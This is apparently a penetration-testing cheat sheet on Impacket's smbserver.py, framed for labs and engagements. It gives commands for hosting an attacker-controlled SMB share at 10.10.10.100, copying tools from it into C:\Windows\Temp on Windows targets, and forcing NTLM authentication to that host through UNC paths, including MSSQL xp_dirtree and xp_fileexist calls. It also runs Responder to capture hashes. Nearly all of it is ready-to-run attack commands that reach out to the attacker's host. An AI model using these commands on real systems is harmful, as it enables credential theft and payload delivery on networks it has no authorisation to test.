smbserver.py starts an attacker-controlled SMB share. We use it for file transfer, payload staging in labs, and controlled UNC paths that force a Windows service or user to authenticate to us.
Anonymous share
mkdir -p /tmp/loot
smbserver.py -smb2support loot /tmp/loot
Authenticated share
smbserver.py -smb2support -username user -password pass loot /tmp/loot
Windows copy from attacker share
copy \\10.10.10.100\loot\tool.exe C:\Windows\Temp\tool.exe
dir \\10.10.10.100\loot
PowerShell copy
Copy-Item "\\10.10.10.100\loot\tool.exe" "C:\Windows\Temp\tool.exe"
Capture-oriented test path
dir \\10.10.10.100\loot
MSSQL UNC coercion example
EXEC master..xp_dirtree '\\10.10.10.100\loot',1,1;
EXEC master..xp_fileexist '\\10.10.10.100\loot\file.txt';
Responder alternative
sudo responder -I eth0
Notes
- If the target cannot reach outbound TCP/445 to the attacker, SMB transfer and SMB authentication capture will fail.
- In segmented networks, use HTTP, WinRM, or an internal pivot instead.